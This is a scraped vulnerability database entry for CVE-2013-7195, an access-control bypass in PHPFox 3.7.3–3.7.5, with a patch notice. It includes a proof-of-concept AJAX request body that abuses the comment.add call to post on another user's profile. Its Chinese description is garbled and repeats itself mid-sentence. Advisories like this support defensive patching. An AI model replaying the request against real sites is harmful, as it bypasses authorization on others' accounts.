Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:62087
HistoryApr 09, 2014 - 12:00 a.m.

PHPFox访问控制安全限制绕过漏洞

2014-04-0900:00:00
Root
www.seebug.org
21

0.001 Low

EPSS

Percentile

48.1%

JSON

Bugtraq ID:66672
CVE ID:CVE-2013-7195

PHPFox是社交网络脚本。

PHPFox 3.7.3, 3.7.4, 3.7.5在实现上存在安全限制绕过漏洞,攻击者可利用此漏洞PHPFox是社交网络脚本。
0
PHPFox
目前厂商已经发布了升级补丁以修复漏洞,请下载使用:
www.phpfox.com


                                                &core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7
&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0 val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!& core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290

Related

prion 1
cve 1
securityvulns 2
packetstorm 1
prion
prion
Design/Logic Flaw
2014-04-18 22:14:00
cve
cve
CVE-2013-7195
2014-04-18 22:14:00
securityvulns
securityvulns
Vulnerability in PHPFox v3.7.3, v3.7.4 and v3.7.5 all build [ CVE-2013-7195, CVE-2013-7196 ]
2014-05-05 00:00:00
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2014-05-05 00:00:00
packetstorm
packetstorm
PHPFox 3.7.5 Authorization Bypass
2014-04-05 00:00:00

0.001 Low

EPSS

Percentile

48.1%

JSON
Related for SSV:62087
prion1cve1securityvulns2packetstorm1